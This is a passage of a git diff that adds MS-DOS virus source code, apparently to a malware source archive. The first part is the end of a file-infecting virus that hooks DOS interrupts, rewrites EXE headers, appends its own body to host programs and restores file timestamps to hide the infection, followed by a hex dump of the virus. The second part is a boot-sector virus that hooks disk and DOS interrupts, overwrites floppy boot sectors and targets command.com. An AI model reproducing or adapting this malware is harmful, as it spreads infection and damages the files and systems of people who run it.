BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... 
+ JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. +;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. +;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... 
+;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C +;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7. +;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X... +;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9. +;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u +;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t( +;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX +;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$.. 
+;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P +;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?! +;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+ +;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z. +;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%. +;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum... +;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)... +;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)... +;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4 +;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>. +;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G... +;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR +;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u.. +;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw. +;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp... +;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6.. +;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u. +;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!.... +;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E... +;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4> +;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$ +;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8. +;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I +;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW. +;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M +;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9. 
+;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4 +;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM! +;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M +;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M! +;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_ +;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I. +;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x.. +;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.# +;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6 +;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!| +;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e. +;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3 +;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O. +;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|... +;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@ +;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!.. +;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t. +;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E +;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E. +;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X. +;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<. +;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k............. +;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]... +;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R......... +;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 
+;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K.......... +;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:.... +;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................ +;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P.. +;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O...... +;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~ +;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p. +;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%....... +;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;<<<<<<<<<< ORIGINAL CODE BEGINS HERE +;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;>>>>>>>>>> ORIGINAL CODE ENDS HERE 
+;0910 4D 73 44 6F 73
+;-----------------------------------------------------------------------;
+ END
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.virusa.asm b/MSDOS/Virus.MSDOS.Unknown.virusa.asm
new file mode 100644
index 00000000..b113a6af
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.virusa.asm
@@ -0,0 +1,1204 @@ +start segment + assume cs:start,ds:start + org 100h +boot equ 0f00h +kezd: db 52h,24h + jmp hideg + nop + jmp meleg + nop + jmp tamad +veg1: dw 0 +kezd1: dw 0 +meleg: pop si + pop ds + pop [si] + pop [si+2] + mov si,boot + mov di,7c00h + push cs + pop ds + xor ax,ax + mov es,ax + mov cx,100h + pushf + cld + rep movsw + popf +ok1: db 0eah,00,7ch,0,0 +hideg: xor ax,ax + push si + push di + push cx + cld + mov di,offset flag1 + mov si,offset flagv +awq: stosb + cmp di,si + jc awq + pop cx + pop di + pop si + mov es,ax + mov ax,es:word ptr [4ch] + mov cs:word ptr [int13+1],ax + mov ax,es:word ptr [4eh] + mov cs:word ptr [int13+3],ax + mov ax,offset it13 + mov es:word ptr [4ch],ax + mov es:[4eh],cs + mov ax,es:word ptr [84h] + mov cs:word ptr [int21+1],ax + mov ax,es:word ptr [86h] + mov cs:word ptr [int21+3],ax + mov ax,0f000h + mov es,ax + mov al,es:byte ptr[0fff0h] + cmp al,0eah + jnz meleg + mov ax,es:word ptr[0fff1h] + mov cs:word ptr [reset+1],ax + mov ax,es:word ptr[0fff3h] + mov cs:word ptr [reset+3],ax + jmp meleg +int13: db 0eah,0,0,0,0 +int21: db 0eah,0,0,0,0 +int40: db 0eah,0,0,0,0 +flag1: db 0 +flag2: db 0 +flag3: db 0 +flag4: dw 0 +flag5: db 0 +flagv db 0 +egys: db 0 +sub13: cmp dl,0 + jz sub40 +visx: pushf + push cs + mov dl,cs:byte ptr [egys] + call int13 + ret +sub40: push ax + mov al,cs:byte ptr [flag5] + cmp al,80 + pop ax + jmp visx + pushf + push cs + call int40 + ret +subru: push ax + push cx + push dx + push ds + xor ax,ax + mov ds,ax + mov ax,ds:word ptr [78h] + mov cs:word ptr [int1e],ax + mov ax,ds:word ptr [7ah] + mov cs:word ptr [int1e+2],ax + mov al,cs:byte ptr [sav] + cmp al,28h + jz dds + mov bx,offset hdtbl + jmp hds +dds: mov bx,offset dstbl + mov cx,offset tb360 + jmp okea +hds: mov ax,cs:word ptr [szekt] + mov cx,offset tb12 + cmp ax,0fh + jz okea + mov cx,offset tb720 + cmp ax,9 + jz okea + mov cx,offset tb14 +okea: mov ds:word ptr [78h],cx + mov ds:word ptr [7ah],cs + pop ds + pop dx + pop cx + pop ax + call sub13 
+ push ax + push cx + push dx + push ds + pushf + xor ax,ax + mov ds,ax + mov ax,cs:word ptr [int1e] + mov ds:word ptr [78h],ax + mov ax,cs:word ptr [int1e+2] + mov ds:word ptr [7ah],ax + popf + pop ds + pop dx + pop cx + pop ax + ret +sub21: pushf + push cs + call int21 + ret +it21: cmp ah,3dh + jnz fu3e + push bx + push cx + push ax + push dx + push es + push ds + mov bx,dx +cikl1: mov al,[bx] + cmp al,0 + jz veg + inc bx + jmp cikl1 +veg: push si + mov si,offset nev + dec bx + dec si + mov cx,11 +cikl2: mov al,[bx] + or al,20h + cmp al,cs:[si] + jz nem4 + jmp nem1 +nem4: dec si + dec bx + loop cikl2 + pop si + pop ds + pop es + pop dx + pop ax + pop cx + pop bx + call sub21 + jnc igen1 + retf 2 +igen1: mov cs:word ptr [flag4],ax +nem2: clc + retf 2 +fu3e: cmp ah,3eh + jz aah + jmp int21 +aah: cmp bx,cs:word ptr [flag4] + jz folyt8 + jmp int21 +folyt8: cmp cs:word ptr [flag4],0 + jnz folyt9 + jmp int21 +folyt9: mov cs:word ptr [flag4],0 + call sub21 + push ds + push es + push ax + push bx + push cx + push dx + mov cs:byte ptr [fo],0 +ujfo: mov bx,200h + mov ah,48h + call sub21 + cmp bx,200h + jnc fogl +nem3: pop dx + pop cx + pop bx + pop ax + pop es + pop ds + retf 2 +fo: db 0 +fogl: push ax + and ax,0fffh + cmp ax,0db0h + jc okes1 + pop ax + cmp cs:byte ptr [fo],3 + jz nem3 + inc cs:byte ptr [fo] + jmp ujfo +okes1: pop ax +okes: mov es,ax + mov cs:word ptr [szegm],ax + mov si,0 + mov di,0 + mov cx,1000h + push cs + pop ds + pushf + cld + rep movsw + popf + xor ax,ax + mov ds,ax + mov ax,0 + mov ds,ax + mov ax,offset it21 + mov dx,cs + mov bx,0 + mov cx,0fff0h +tovabb: call keres + jnz nincs + push ax + mov ax,cs:word ptr [int21+1] + mov ds:word ptr [bx],ax + mov ax,cs:word ptr [int21+3] + mov ds:word ptr [bx+2],ax + pop ax + jmp tovabb +reset: db 0eah,0f0h,0ffh,0,0f0h +nincs: mov ax,offset it13 + mov dx,cs + mov bx,0 + mov cx,0fff0h +tovab1: call keres + jnz kil2 + push ax + mov ax,es + mov ds:word ptr [bx+2],ax + pop ax + jmp tovab1 +kil2: mov ax,0 + mov ds,ax 
+ mov ax,ds:word ptr [100h] + mov es:word ptr [int40+1],ax + mov ax,ds:word ptr [102h] + mov es:word ptr [int40+3],ax + call beszur + mov ax,offset it40 + jmp nem3 + mov ds:word ptr [100h],ax + mov ax,es + mov ds:word ptr [102h],ax + mov es:byte ptr [flag5],80 + jmp nem3 +keres: push ax + push dx +ker1: cmp word ptr[bx],ax + jz van1 +nincs1: inc bx + loop ker1 + inc cx +kil1: pop dx + pop ax + ret +van1: cmp word ptr [bx+2],dx + jnz nincs1 + jmp kil1 +nem1: pop si + pop ds + pop es + pop dx + pop ax + pop cx + pop bx + jmp int21 + db 'command.com' +nev: db 0 +it13: push bx + push ax + push cx + push dx + push es + push ds + push di + push si + push cs + pop ds + push cx + push ax + push dx + mov bx,offset atir + mov cx,2 +erdf: call ftr + jc poiu + loop erdf + jmp reset +ftr: mov al,90h + clc + mov [bx],al +atir: stc + nop + nop + nop + nop + nop + nop + nop + mov al,0f9h + mov [bx],al + ret +poiu: pop dx + pop ax + pop cx + cmp cs:byte ptr [mod1],1 + jnz awsw + jmp leol +awsw: mov cs:byte ptr [egys],dl + cmp ah,2 + jc aab + cmp ah,4 + jnc aab + cmp cx,3 + jnc aab + cmp dh,0 + jnz aab + mov cs:byte ptr [flag3],80h +aab: mov al,cs:byte ptr [flag1] + cmp al,80h + jz ugr1 + xor ax,ax + mov es,ax + mov ax,es:word ptr [84h] + cmp ax,cs:word ptr [int21+1] + jz tov1 + jmp dos +tov1: mov ax,es:word ptr [86h] + cmp ax,cs:word ptr [int21+3] + jz ugr1 + jmp dos +ugr1: cmp di,55aah + jnz norm + cmp si,5aa5h + jnz norm + pop si + mov si,0a55ah + push si +norm: cmp dl,20h + jc lemeza + cmp dl,80h + jz win +fdg: jmp kilep +win: jmp wincsi +it40: jmp int40 +lemeza: mov al,cs:byte ptr [flag3] + cmp al,80h + jz lcsere + cmp ah,5 + jnz haha1 +haha2: mov cs:byte ptr [flag3],84h + jmp haha +haha1: cmp al,0 + jz haha + dec cs:byte ptr [flag3] +haha: jmp kilepo +hah1: call sub13 + jnc viter1 +idt: cmp ah,6 + jnz viter + mov cs:byte ptr [flag3],80h +viter: stc +viter1: retf 2 +lcsere: mov cs:byte ptr [flag2],0 + cmp ah,5 + jz haha2 + mov cx,3 +cikl7: push cx + mov cs:byte ptr [flag3],0 + 
mov bx,boot+200h + mov ax,201h + mov cx,1 + mov dx,0 + push cs + pop es + call sub13 + pop cx + jnc ugr4 + loop cikl7 + jmp kilep +ugr4: push cs + pop ds + mov bx,boot+200h + mov cx,200h + mov ax,0cdfbh + mov dx,7213h + call keres + jz folyt1 + jmp kilep +folyt1: mov cs:byte ptr [fert],1 + mov ax,[bx+5] + cmp ax,12cdh + mov cs:word ptr [cime],bx + mov cs:word ptr[wax],308h + jz foi + jmp folyt2 +foi: mov al,cs:[bx+5+offset ver1-offset kezd2] + cmp al,23 + jnz meh + mov ax,cs:[bx+6+offset ver1-offset kezd2] + cmp ax,word ptr ver1+1 + jnc kilepo +meh: mov cs:word ptr [wax],307h + jmp folyt2 +fert: db 0,0 +kilepo: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop ax + pop bx + cmp dh,0 + jz ugs + jmp hah1 +ugs: cmp cx,1 + jz bout1 + jmp hah1 +bout1: cmp ah,2 + jz bout + cmp ah,3 + jz save + jmp hah1 +bout: call sub13 + jnc ada + jmp idt +ada: cmp cs:byte ptr [flag1],80h + jz ase + jmp hah1 +ase: push si + pushf + mov si,offset bot1 + call ase1 + popf + pop si + jmp viter1 +save: cmp cs:byte ptr [fert],1 + jz save2 + jmp kif +save2: mov cs:byte ptr [fert],0 + push bx + push ax + push cx + push dx + push es + push ds + push di + push si + push es + pop ds + push cs + pop es + mov cx,200h + mov si,bx + mov di,offset boot+200h + rep movsb + jmp folyt3 +kif: pop bx + pop cx + pop cx + pop dx + pop es + pop ds + pop di + pop si + clc + jmp viter1 +ase1: push bx + push ax + push cx + push dx + push di + push ds + push cs + pop ds + mov ax,cs:word ptr [cime] + and ax,0ffh + add bx,ax + mov di,bx + mov cx,59h + pushf + cld + rep movsb + popf + pop ds + pop di + pop dx + pop cx + pop ax + pop bx + clc + ret +folyt2: mov bx,boot+200h + mov ax,301h + mov cx,1 + mov dx,0 + push cs + pop es + call sub13 + jnc folyt3 + jmp kilep +folyt3: push cs + pop ds + mov bx,boot+200h + mov ax,[bx+18h] + mov cs:word ptr [szekt],ax + mov cx,[bx+1ah] + mul cx + mov cx,ax + mov ax,[bx+13h] + mov dx,0 + div cx + mov cs:byte ptr [sav],al + mov ch,al + mov al,1 +ugr3: nop + mov cl,5 + mov 
ah,5 + push cs + pop es + mov dx,0 + push cx + cmp cs:word ptr [wax],307h + clc + jz waxi + cmp cs:byte ptr [fert],0 + clc + jz waxi + call subru +waxi: push ds + push ax + pop ax + pop ds + pop cx + jnc jo4 + jmp kilep +sav: db 0 +wax: dw 0 +szekt: dw 0 +jo4: mov si,boot+200h + mov di,boot + push cs + pop ds + push cx + mov cx,100h + pushf + cld + rep movsw + popf + pop cx + push cx + mov ax,cs:word ptr [wax] + mov dx,0 + mov cl,1 + mov bx,100h + cmp cs:byte ptr [fert],0 + clc + jz hoho + call sub13 +hoho: pop cx + jnc jo2 + jmp kilep +jo2: push cs + pop ds + push cx + mov bx,boot+200h + mov ax,0cdfbh + mov dx,7213h + mov cx,200h + call keres + pop cx + jz jo3 + jmp kilep +jo3: push bx + push cx + mov cx,100h + mov ax,0e432h + mov dx,16cdh + call keres + jz jo5 + pop cx + pop bx + jmp kilep +jo5: sub bx,6 + mov cs:word ptr [veg1],bx + pop cx + pop bx + add bx,5 + mov cs:word ptr [kezd1],bx + mov cs:byte ptr [fej+2],ch + push cx + mov si,offset kezd2 + mov bx,cs:word ptr [kezd1] + mov cx,offset veg2-offset kezd2 + push cs + pop ds +cikl9: mov al,[si] + mov [bx],al + inc bx + inc si + loop cikl9 +cikl10: mov ds:byte ptr [bx],90h + inc bx + cmp bx,cs:word ptr [veg1] + jc cikl10 + pop cx + mov cx,3 +wqe: push cx + mov cx,1 + mov dx,0 + mov ax,301h + mov bx,boot+200h + push cs + pop es + call sub13 + jc kikk + pop cx + cmp cs:byte ptr [fert],0 + jnz kig + jmp kif +kig: jmp kilepo +kikk: pop cx + loop wqe + jmp kilep +dos: nop + mov al,80h + mov cs:byte ptr [flag1],al + mov ax,es:word ptr [84h] + mov cs:word ptr [int21+1],ax + mov ax,es:word ptr [86h] + mov cs:word ptr [int21+3],ax + mov ax,offset it21 + mov es:word ptr [84h],ax + mov es:[86h],cs +kilep: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop ax + pop bx + jmp int13 +tamad: push cs + pop ds + mov cs:word ptr [szama],28800 + xor ax,ax + push si + push di + push cx + cld + mov di,offset flag1 + mov si,offset flagv +alsk: stosb + cmp di,si + jc alsk + pop cx + pop di + pop si + mov es,ax + mov cs:byte 
ptr[flag1],80h + mov ax,es:word ptr [4ch] + mov cs:word ptr [int13+1],ax + mov ax,es:word ptr [4eh] + mov cs:word ptr [int13+3],ax + mov ax,offset it13 + mov es:word ptr[4ch],ax + mov es:word ptr[4eh],cs + mov ax,201h + mov bx,offset boot+400h + push cs + pop es + mov dx,180h + mov cx,1 + int 13h + mov ax,0 + mov es,ax + mov ax,cs:word ptr [int13+1] + mov es:word ptr[4ch],ax + mov ax,cs:word ptr [int13+3] + mov es:word ptr[4eh],ax + mov ax,0f000h + mov es,ax + mov al,es:byte ptr [0fff0h] + cmp al,0eah + jnz akdj + mov ax,es:word ptr [0fff1h] + mov cs:word ptr [reset+1],ax + mov ax,es:word ptr [0fff3h] + mov cs:word ptr [reset+3],ax +akdj: retf +kezd2: int 12h + mov bx,40h + mul bx + sub ax,1000h + mov es,ax + mov dx,0 + jmp fej +ver1: db 23,0,6 +fej: mov cx,2801h + mov ax,208h + mov bx,100h + push bx + cmp es:word ptr [bx],2452h + jz el1 + int 13h + pop bx + jc veg2 